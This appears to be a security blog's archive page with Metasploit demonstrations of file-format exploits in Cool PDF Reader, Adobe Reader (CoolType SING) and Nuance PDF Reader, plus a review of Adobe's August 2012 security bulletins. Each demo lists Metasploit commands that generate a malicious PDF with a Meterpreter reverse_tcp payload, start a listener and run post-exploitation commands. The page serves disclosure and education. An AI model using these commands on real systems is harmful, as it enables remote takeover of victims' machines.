Tag Archives: PDF

CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to Secunia by Francis Provencher the 2012-12-19
Vulnerability publicly disclosed by Francis Provencher the 2013-01-18
Metasploit PoC provided the 2013-03-17

PoC provided by :

Francis Provencher
Chris Gabriel
juan vazquez

Reference(s) :

CVE-2012-4914
OSVDB-89349

Affected version(s) :

Cool PDF Reader equal or prior to version 3.0.2.256

Tested on Windows XP Pro SP3 with :

Cool PDF Reader 3.0.2.256

Description :

This module exploits a stack buffer overflow in Cool PDF Reader equal or prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/fileformat/coolpdf_image_stream_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit -j

sysinfo
getuid

Adobe August 2012 Patch Tuesday Review

Adobe has release, the 14 August 2012, during his August Patch Tuesday, three security bulletins dealing with 26 vulnerabilities. All these security bulletins have a Critical severity rating and 23 of 26 vulnerabilities have a CVSS base score of 10.0.

APSB12-16 – Security update for Adobe Reader and Acrobat

APSB12-16 is concerning Adobe Reader and Acrobat X (10.1.3) and earlier versions for Windows and Macintosh. 20 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. 18 of the 20 vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159 and CVE-2012-4160 have been discovered and privately reported by Mateusz Jurczyk and Gynvael Coldwind, of the Google Security Team. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4147 (CVSS base score of 10.0), CVE-2012-4161 (CVSS base score of 7.5) and CVE-2012-4162 (CVSS base score f 7.5) have been discovered and privately reported by James Quirk.

CVE-2012-2051, with a CVSS base score of 10.0, has been discovered and privately reported by Mateusz Jurczyk of the Google Security Team.

CVE-2012-2049, with a CVSS base score of 10.0, has been discovered and privately reported by Pavel Polischouk of the Vulnerability Research team at TELUS Security Labs.

CVE-2012-2050, with a CVSS base score of 10.0, has been discovered and privately reported by an anonymous contributor working with Beyond Security’s SecuriTeam Secure Disclosure Program.

CVE-2012-4148, with a CVSS score of 10.0, has been discovered and privately reported by John Leitch at Microsoft and Microsoft Vulnerability Research (MSVR).

CVE-2012-1525, with a CVSS score of 10.0, has been discovered and privately reported by Nicolas Grégoire through iDefense’s Vulnerability Contributor Program.

Despite the high number of fixed vulnerabilities, Adobe Reader for Linux has not been updated and they are still known vulnerabilities in the Windows and Macintosh versions. Adobe plan to release an out-of-band update for Adobe Reader for Linux before 27 August.

APSB12-17- Security update for Adobe Shockwave Player

APSB12-17 is concerning Adobe Shockwave Player 11.6.5.635 and earlier versions on the Windows and Macintosh. 5 vulnerabilities have been fixed in these updates, all of them are classified as Critical and allow code execution. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2043, CVE-2012-2046 and CVE-2012-2047 have been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2045, with a CVSS base score of 10.0, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-2044, with a CVSS base score of 10.0, has been discovered and privately reported by suto.

APSB12-18 – Security update for Adobe Flash Player

APSB12-18 is concerning Adobe Flash Player 11.3.300.270 and earlier versions for Windows, Macintosh and Linux.

CVE-2012-1535, with a CVSS base score of 9.3, has been discovered exploited in the wild in limited targeted attacks, distributed through a malicious Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. But since the 18 August a Metasploit module is available and doesn’t require to forge a malicious Word document. The Metasploit module is actually focusing on Windows XP SP3 and is still quiet unstable, but you should urgently update your Flash Player.

CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Timeline :

Vulnerability discovered by corelanc0d3r & rick2600 the 2010-04-03
Vulnerability disclosed to the vendor the 2010-04-08
Coordinated vulnerability disclosure the 2010-10-08
Metasploit PoC provided the 2010-10-08

PoC provided by :

corelanc0d3r
rick2600

Reference(s) :

OSVDB-68514

Affected version(s) :

Nuance PDF Reader 6.0

Tested on Windows XP SP3 with :

Nuance PDF Reader 6.0

Description :

This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/nuance_pdf_launch_overflow
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig